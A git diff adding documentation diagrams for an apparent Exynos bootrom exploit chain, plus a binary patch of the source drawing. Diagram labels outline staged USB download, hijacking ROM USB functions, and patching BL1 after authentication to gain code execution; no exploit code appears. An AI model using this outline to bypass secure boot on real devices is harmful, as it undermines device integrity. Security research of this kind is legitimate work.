+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="1101px" height="331px" viewBox="-0.5 -0.5 1101 331" content="&lt;mxfile host=&quot;04n1rgtnob7ebrhhg57mh2mjuh68d4qe61ncs1a2e1n2no0ifp02&quot; modified=&quot;2024-08-17T12:19:10.470Z&quot; agent=&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Code/1.90.2 Chrome/122.0.6261.156 Electron/29.4.0 Safari/537.36&quot; etag=&quot;KKJYI1_nldUocN3jMCBl&quot; version=&quot;12.2.4&quot; pages=&quot;1&quot;&gt;&lt;diagram id=&quot;ADw-6-ScJEZwpCBiqabR&quot; name=&quot;Page-1&quot;&gt;7Vnbbts4EP0aP24gWZZsPza2t0XRYoF1iraPjDiSmNKkQFG+7NeXpEiJCt1ugRox0uTFEQ+Ht5kzRyNmkqx2x7cC1dVHjoFOphE+TpL1ZDqNp8ul+qORU4eky6gDSkGwNRqALfkPLOjMWoKhGRlKzqkk9RjMOWOQyxGGhOCHsVnB6XjVGpUQANsc0RD9TLCsOnSRRgP+DkhZuZXjyPbskDO2QFMhzA8elGwmyUpwLrun3XEFVDvP+aUb9/cPevuNCWDyVwbM7DbkyZ0NsDqqbXIhK15yhuhmQG8FbxkGPUGkWoPNB85rBcYKfAApTzZuqJVcQZXcUdsLRyK/eM9f9VQ3qW2tj3Zm0zi5BpPi9MVveKN0cxhmWm5c6BDro4a3IrdnnloOIVGCtUo6SHvDG2ad+Bb4DtQqykAARZLsx8RAll9lbzeEQD3YKJyPiN3LHtHWTro51pQTGUaKUkV4HRHFolqDmLf3FDY97vkco6bqY3aoiISmRub8B5WjCkNN3aVKQY7a8LYglK445cKslhSLHPJcLyYF/wZez/0inaU/9fUehITjT/1oe11eWGGI57Z9GNIss1DlZZjDfsfx89dUGHjvp0J6rVRIglTYSiWtcRCocRgMu7djdnsuf8RriHEK83O8XmbzBGWX4XU8e0TsxTwgdnqG2M75v+PGxSuxBxb7xM6uRew0IPYa7tuyBPEMqd3zttfs2U0akDuOz7A7vYBsu3lfOL2zkN7La9E7C+j97z8fFfBpq84SrfmBUY7wRan+NNXJ7LGKPzHVX6t1j9c+1eOrlevLP0nKs6D8fkp2x4ErJ9OMSu0X1ZWV+skVgB2uphy6HIjJ3kF3FQjQSzTqh6lvasUQxtuy0oExrtcXB+qn06NIVhopWrMv3McxIkz9cGbMBWINyiXhClsZZg4DiWikibm+P9Aj6Km7hShI2Qpoeg0UkINmofIY0wtjq4lNP9ewen9U72ABt1SA5ZhAY6Iwvfsxqyyk/UBYqYB0aN0Zbfhr+iOicsWpgpqLi4pgDCwQmkvUzGMyzsJPwb6Sqsa3LRcgY/gZHpJxHcbo/+g45lVFHlD+bQi6I4dsBTNEZJZoliYU5GDcvVNx/za1MNNMsBy8UQ9vWoUzSXIkDQH1RYKd7qHd1Y1LASK19V1lcgVRqi/JdABlXml6TKPbD7HuKaTZOhqmNTt8sSxNHmlmr4UeT5PkjGZehqevtxb++39UE1zt8y4OLy7eq1RzOfTsyt5FfM2yIPxYDpW4E853Rk5/VY1voeCmOtAy2Emcec93OudrrKfDaognut2oUHddyYGoqQ46mVchNgVDSfbduLYxxQHW5nCEvHVabyW224iZSC+mx79YlZ2n6TVVNvyifcZVfhxFT5fPqjn8N8v0ef8TTDbfAQ==&lt;/diagram&gt;&lt;/mxfile&gt;"><defs/><g><path d="M 70 170 L 123.63 170" fill="none" stroke="#000000" stroke-miterlimit="10" pointer-events="stroke"/><path d="M 128.88 170 L 121.88 173.5 L 123.63 170 L 121.88 166.5 Z" fill="#000000" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/><ellipse cx="40" cy="170" rx="30" ry="30" fill="#f8cecc" stroke="#b85450" pointer-events="all"/><ellipse cx="40" cy="170" rx="26" ry="26" fill="none" stroke="#b85450" pointer-events="all"/><g transform="translate(21.5,163.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="36" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; white-space: nowrap; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;">Exploit</div></div></foreignObject></g><path d="M 180 170 L 233.63 170" fill="none" stroke="#000000" stroke-miterlimit="10" pointer-events="stroke"/><path d="M 238.88 170 L 231.88 173.5 L 233.63 170 L 231.88 166.5 Z" fill="#000000" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/><rect x="130" y="157" width="50" height="25" fill="#e1d5e7" stroke="#9673a6" pointer-events="all"/><g transform="translate(135.5,163.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="38" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 39px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">Stage1</div></div></foreignObject></g><path d="M 350 170 L 423.63 170" fill="none" stroke="#000000" stroke-miterlimit="10" pointer-events="stroke"/><path d="M 428.88 170 L 421.88 173.5 L 423.63 170 L 421.88 166.5 Z" fill="#000000" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/><rect x="240" y="144.5" width="110" height="50" fill="#e1d5e7" stroke="#9673a6" pointer-events="all"/><g transform="translate(268.5,163.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="53" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 54px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">Debugger</div></div></foreignObject></g><path d="M 540 170 L 603.63 170" fill="none" stroke="#000000" stroke-miterlimit="10" pointer-events="stroke"/><path d="M 608.88 170 L 601.88 173.5 L 603.63 170 L 601.88 166.5 Z" fill="#000000" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/><rect x="430" y="144.5" width="110" height="50" fill="#f8cecc" stroke="#b85450" pointer-events="all"/><g transform="translate(431.5,155.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="106" height="27"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 106px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">ROM USB Download</div></div></foreignObject></g><path d="M 720 170 L 793.63 170" fill="none" stroke="#000000" stroke-miterlimit="10" pointer-events="stroke"/><path d="M 798.88 170 L 791.88 173.5 L 793.63 170 L 791.88 166.5 Z" fill="#000000" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/><rect x="610" y="145" width="110" height="50" fill="#e1d5e7" stroke="#9673a6" pointer-events="all"/><g transform="translate(638.5,163.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="53" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 54px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">Debugger</div></div></foreignObject></g><rect x="0" y="10" width="225" height="110" fill="none" stroke="none" pointer-events="all"/><g transform="translate(4.5,-0.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="215" height="117"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; overflow: hidden; max-height: 120px; max-width: 215px; width: 215px; white-space: normal; overflow-wrap: normal; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;"><h1>Stage1</h1><div>There is not enough space to load the full debugger in one transaction, so the first stage only configures USB receive and downloads the debugger</div></div></div></foreignObject></g><rect x="310" y="220" width="330" height="110" fill="none" stroke="none" pointer-events="all"/><g transform="translate(314.5,209.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="320" height="102"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; overflow: hidden; max-height: 120px; max-width: 320px; width: 320px; white-space: normal; overflow-wrap: normal; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;"><h1>Debugger</h1><div>The debugger hijacks the USB return function and lets the ROM download the next stage. Authenticates it and jumps to it. This allows patching BL1 after authentication</div></div></div></foreignObject></g><path d="M 910 170 L 983.63 170" fill="none" stroke="#000000" stroke-miterlimit="10" pointer-events="stroke"/><path d="M 988.88 170 L 981.88 173.5 L 983.63 170 L 981.88 166.5 Z" fill="#000000" stroke="#000000" stroke-miterlimit="10" pointer-events="all"/><rect x="800" y="145" width="110" height="50" fill="#f8cecc" stroke="#b85450" pointer-events="all"/><g transform="translate(827.5,163.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="54" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 55px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">Jump BL1</div></div></foreignObject></g><rect x="745" y="220" width="330" height="110" fill="none" stroke="none" pointer-events="all"/><g transform="translate(749.5,209.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="320" height="102"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; overflow: hidden; max-height: 120px; max-width: 320px; width: 320px; white-space: normal; overflow-wrap: normal; text-align: left;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;"><h1>USB Hijack</h1><div>Before jumping in BL1 the ROM function for downloading the next stage is also hijacked, giving us code execution after BL1 is loaded</div></div></div></foreignObject></g><rect x="990" y="145" width="110" height="50" fill="#e1d5e7" stroke="#9673a6" pointer-events="all"/><g transform="translate(1018.5,163.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="53" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 54px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">Debugger</div></div></foreignObject></g></g></svg>
\ No newline at end of file
diff --git a/documentation/_build/confluence/svgs/f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg b/documentation/_build/confluence/svgs/f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg
new file mode 100644
index 0000000..a4b15b8
--- /dev/null
+++ b/documentation/_build/confluence/svgs/f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="221px" height="212px" viewBox="-0.5 -0.5 221 212" content="&lt;mxfile host=&quot;04n1rgtnob7ebrhhg57mh2mjuh68d4qe61ncs1a2e1n2no0ifp02&quot; modified=&quot;2024-08-03T09:24:03.282Z&quot; agent=&quot;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Code/1.90.2 Chrome/122.0.6261.156 Electron/29.4.0 Safari/537.36&quot; etag=&quot;4yVHPhEEQZpE4jmcyLS-&quot; version=&quot;12.2.4&quot; pages=&quot;1&quot;&gt;&lt;diagram id=&quot;94hHFOWSBfnqqOcBf2es&quot; name=&quot;Page-1&quot;&gt;vZZNc6QgEIZ/DXeV0dFrJtnsJac55JhCaJUalCkG48z++kUFP6JJprbMehHe7obmoUERPpTXZ0XOxYtkIFDgsSvCjygI/CBJzKtVbr0SJl4v5Ioz6zQKR/4HrOjcas7gMnPUUgrNz3ORyqoCqmcaUUo2c7dMivmsZ5LDQjhSIpbqK2e66NU49Eb9N/C8cDP7nrWkhJ5yJevKzocCnHVPby6JG8v6XwrCZDOR8BPCByWl7lvl9QCiZeuw9XG/PrEOeSuo9D0BQR/wTkQNLuMuL31zLLrVQOvvIfzQFFzD8Uxoa23M7hut0KUwPd80My7EQQqpulizdogoNfpFK3mCiYXtk9RrB1xmbBfxDkrDdSLZFTyDLEGrm3FxVkffVpsrtmbcugF4Mdm2odyILZd8GHpEZhqW2jpBvCBY80rj4E0bta5Om/JkBOJslWdEY0izjXj63/P01nhugHP3FU5GNHm7tLfFplBDiNluDWocpDiKfgbq0P8fVKMF1RYlCh9Q+LjtgY8prB/4NA534VYH/iNLfCdLP9oA5n61RP2oK9HMXN2gNmUKvqnQ/RrTJNpj8kP1efep/4dL1HTHT1xnm/xH4Ke/&lt;/diagram&gt;&lt;/mxfile&gt;" style="background-color: rgb(255, 255, 255);"><defs/><g><rect x="0" y="0" width="220" height="210" fill="#ffe6cc" stroke="#d79b00" pointer-events="all"/><rect x="10" y="0" width="200" height="20" fill="#dae8fc" stroke="#6c8ebf" pointer-events="all"/><g transform="translate(77.5,3.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="65" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 66px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">uint32_t unk</div></div></foreignObject></g><rect x="10" y="20" width="200" height="20" fill="#d5e8d4" stroke="#82b366" pointer-events="all"/><g transform="translate(61.5,23.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="97" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 98px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">uint32_t data_size</div></div></foreignObject></g><rect x="10" y="40" width="200" height="160" fill="#f8cecc" stroke="#b85450" pointer-events="all"/><g transform="translate(94.5,113.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="30" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 31px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">data[]</div></div></foreignObject></g><rect x="10" y="200" width="200" height="10" fill="#e1d5e7" stroke="#9673a6" pointer-events="all"/><g transform="translate(71.5,198.5)"><foreignObject style="overflow:visible;" pointer-events="all" width="77" height="12"><div xmlns="http://www.w3.org/1999/xhtml" style="display: inline-block; font-size: 12px; font-family: Helvetica; color: rgb(0, 0, 0); line-height: 1.2; vertical-align: top; width: 78px; white-space: nowrap; overflow-wrap: normal; text-align: center;"><div xmlns="http://www.w3.org/1999/xhtml" style="display:inline-block;text-align:inherit;text-decoration:inherit;white-space:normal;">uint16_t footer</div></div></foreignObject></g></g></svg>
\ No newline at end of file
diff --git a/documentation/exynos_exploit_chain.odg b/documentation/exynos_exploit_chain.odg
index 01205f5e58c06d12a50de34fda44ec1a4ab7f566..bf5756e0c4c8195ddc90f95e5093f3623d969357 100644
GIT binary patch
delta 29683
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
